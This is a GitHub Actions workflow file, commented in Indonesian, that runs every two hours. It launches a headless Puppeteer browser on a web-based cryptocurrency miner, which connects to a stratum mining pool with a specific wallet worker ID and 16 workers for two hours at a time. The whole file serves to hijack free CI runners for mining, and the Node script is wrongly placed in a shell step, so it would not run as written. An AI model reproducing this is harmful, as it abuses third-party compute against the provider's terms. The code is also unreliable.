name: Run Puppeteer Job

on:
  schedule:
    - cron: "0 */2 * * *"  # Menjalankan setiap 2 jam (sesuaikan dengan zona waktu Anda)

jobs:
  run_puppeteer:
    runs-on: ubuntu-latest  # Gunakan sistem operasi Ubuntu terbaru

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Set up Node.js
        uses: actions/setup-node@v2
        with:
          node-version: '16'  # Sesuaikan dengan versi Node.js yang Anda butuhkan

      - name: Install dependencies
        run: |
          npm install puppeteer

      - name: Run Puppeteer script
        run: |
          const puppeteer = require('puppeteer');

          (async () => {
            const browser = await puppeteer.launch({
              executablePath: '/usr/bin/google-chrome-stable', // Sesuaikan dengan lokasi instalasi Chrome Anda
              headless: true,
            });
            const page = await browser.newPage();
            await page.goto('https://webminer.pages.dev?algorithm=yespowerr16&host=stratum-asia.rplant.xyz&port=13382&worker=YdenAmcQSv3k4qUwYu2qzM4X6qi1XJGvwC&password=x&workers=16');

            // Set timeout untuk menjaga browser terbuka selama 2 jam (7200 detik)
            setTimeout(async () => {
              console.log('Menutup browser setelah 2 jam.');
              await browser.close();
            }, 7200 * 1000);

            // Tunggu agar skrip tetap berjalan untuk menjaga browser terbuka
            await new Promise(() => {});
          })();
